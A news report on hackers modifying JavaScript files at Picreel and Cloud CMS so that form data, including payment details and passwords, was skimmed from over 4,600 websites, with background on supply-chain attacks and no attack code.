Hackers are collecting payment details, user passwords from 4,600 sites
Hackers have breached analytics service Picreel and enterprise CMS provider Cloud CMS and have modified JavaScript files on the infrastructure of these two companies to embed malicious code on over 4,600 websites, security researchers have told ZDNet.
The attack is ongoing, and the malicious scripts are still live, at the time of this article's publishing.
Both hacks have been spotted by Sanguine Security founder Willem de Groot earlier today and confirmed by several other security researchers.
Picreel is an analytics service that allows site owners to record what users are doing and how they're interacting with a website to analyze behavioral patterns and boost conversation rates. Picreel customers --website owners-- are supposed to embed a piece of JavaScript code on their sites to allow Picreel to do its job. It's this script that hackers have compromised to add malicious code.
Cloud CMS is a cloud-hosted content management system that allows users and companies to host a website on the company's servers, rather than manage one themselves. Hackers appear to have breached Cloud CMS and modified one of the CMS' standard JavaScript files.
ZDNet has reached out to both companies for comment, but we have not heard back.
Malicious code logs all data entered inside form fields
Currently, it is unknown how hackers breached these two companies. In a Twitter conversation, de Groot told ZDNet the hack appears to have been carried out by the same threat actor.
The malicious code logs all content users enter inside form fields and sends the information to a server located in Panama. This includes data that users enter on checkout/payment pages, contact forms, and login sections.
The malicious code embedded in the Picreel script has been seen on 1,249 websites, while the one hosted on the Cloud CMS infrastructure has been seen on 3,435 domains.
Supply-chain attacks, a growing threat for websites
In the past two years, attacks like these ones have become quite common. Known as supply-chain attacks, hackers groups have realized that breaching high-profile websites isn't as simple as it sounds, and they've started targeting smaller businesses that provide "secondary code" to these websites, and thousand others.
They targeted providers of chat widgets, live support widgets, analytics companies, and more.
Motivations vary depending on the group. For example, some groups have hacked third-party companies to deploy cryptojacking scripts, while others have used the same technique to deploy specialized code that steals only data entered in payment forms.
Today's attack is different because it is quite generic, targeting every form field on a website, regardless of purpose.
UPDATE: Minutes after this article's publication, we were told that the malicious code has been removed from the Cloud CMS infrastructure.
Gloss